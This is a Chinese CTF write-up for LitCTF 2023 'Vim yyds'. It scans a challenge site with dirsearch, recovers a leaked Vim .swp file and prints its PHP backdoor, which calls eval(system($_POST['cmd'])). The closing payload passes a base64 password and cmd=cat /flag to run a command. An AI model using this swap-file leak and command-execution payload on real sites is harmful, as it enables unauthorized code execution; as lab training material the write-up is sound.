[LitCTF 2023]Vim yyds

[LitCTF 2023]Vim yyds wp

题目页面如下：

搜索一番，没有发现任何信息。题目描述中说到了源码泄露，那么先进行目录扫描。

dirsearch 目录扫描

命令：

dirsearch -u "http://node4.anna.nssctf.cn:28588/"

返回结果：

在结果中发现一个 .index.php.swp 文件。

直接访问该文件将其下载下来。

关于 .swp 文件

.swp 文件一般是 vim 编辑器在编辑文件时产生的，当用 vim 编辑器编辑文件时就会产生，正常退出时 .swp 文件被删除，但是如果直接叉掉（非正常退出），那么 .swp 文件就会被保留。

使用 vim 编辑器恢复 .swp 交换文件

可以参考：VIM学习笔记 交换文件(swap)

自动检索当前目录下的交换文件：

vim -r

因为该文件中的信息显示原文件是在 /d/CTF/LitCTF/vim/index.php 目录下，为了进行后面的操作，我们先创建一个 /d/CTF/LitCTF/vim/index.php 目录。（或许也有其他的方法）

恢复交换文件

vim -r index.php.swp

按照提示操作后，index.php.swp 文件的内容会被恢复到 /d/CTF/LitCTF/vim/index.php 文件中

这里仅展示 index.php.swp 文件中的 PHP 代码部分：

<?php
error_reporting(0);
$password = "Give_Me_Your_Flag";
echo "<p>can can need Vim </p>";
if ($_POST['password'] === base64_encode($password)) {
    echo "<p>Oh You got my password!</p>";
    eval(system($_POST['cmd']));
}
?>

payload

很简单，只需要 POST 传参 password 等于字符串 “Give_Me_Your_Flag” base64 加密后的值即可。

password=R2l2ZV9NZV9Zb3VyX0ZsYWc=&cmd=cat /flag

拿到 flag ：